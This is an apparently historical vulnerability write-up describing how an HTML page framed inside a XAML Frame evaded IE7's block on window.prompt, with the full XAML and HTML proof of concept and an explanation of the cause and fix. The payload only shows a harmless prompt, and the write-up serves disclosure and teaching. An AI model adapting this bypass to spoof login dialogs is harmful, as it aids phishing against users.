IE7 introduced a security enhancement that blocked window.prompt in the Internet Zone and replaced it with the gold Information Bar, specifically to prevent phishing sites from mimicking login dialogs. While checking how well XAML Frame pages were subject to the same restrictions, I found that calling prompt() from an HTML page hosted inside a XAML <Frame> element worked without restriction — no gold bar, no blocking. I’ll note that I personally never considered prompt to be a serious security concern, but the bypass of a deliberately added security control is worth documenting.

<Page	xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
		WindowTitle="xamlFrameClipboardRead">
	<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
	<Bold>This is a XAML Frame:</Bold>
		<LineBreak /><LineBreak /><LineBreak />
		&lt;<Bold>Frame</Bold> Width="700" Height="600" Source="domain1.html" /&gt;
		<LineBreak /><LineBreak />
		<Frame Width="700" Height="600" Source="prompt.html" />
	</TextBlock>
</Page>

prompt.html (the HTML page loaded inside the XAML Frame):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_promptGoldBarBypass</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XAML_promptGoldBarBypass</h2>
</center>
<hr />
<br />
According to the <a href="http://msdn2.microsoft.com/en-us/ie/aa740486.aspx">IE7 Release Notes WebPage</a>:<br /><br />
<em>Generic Spoofing Risk Reduction in Internet Explorer 7--The window.prompt script method is blocked and the gold Information bar is displayed by default in Internet Zone for Internet Explorer 7.
The helps prevent websites from spoofing things such as the logon screens of other websites. This is a new security enhancement for Internet Explorer 7.</em><br /><br />

However, doing a prompt from inside a Xaml Framed HTML is still possible with not tricks at all...
<hr />
I know this is a bug... but in my opinion, the prompt was never an issue.

<script language="JavaScript">
prompt("What's your Name?","I'm Mr. Prompt bypassed.");
</script>
</body>
</html>

The IE7 window.prompt restriction was implemented in the standard HTML rendering engine’s script host. XAML Frame content ran through a different hosting layer that did not apply the same Internet Zone restrictions, so the prompt() call went through unchecked. The result was that the gold bar security feature — intended to stop phishing dialogs — could be trivially bypassed by wrapping the page in a XAML Frame. The fix required that the XAML Frame host apply the same zone-based script restrictions as the HTML renderer.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.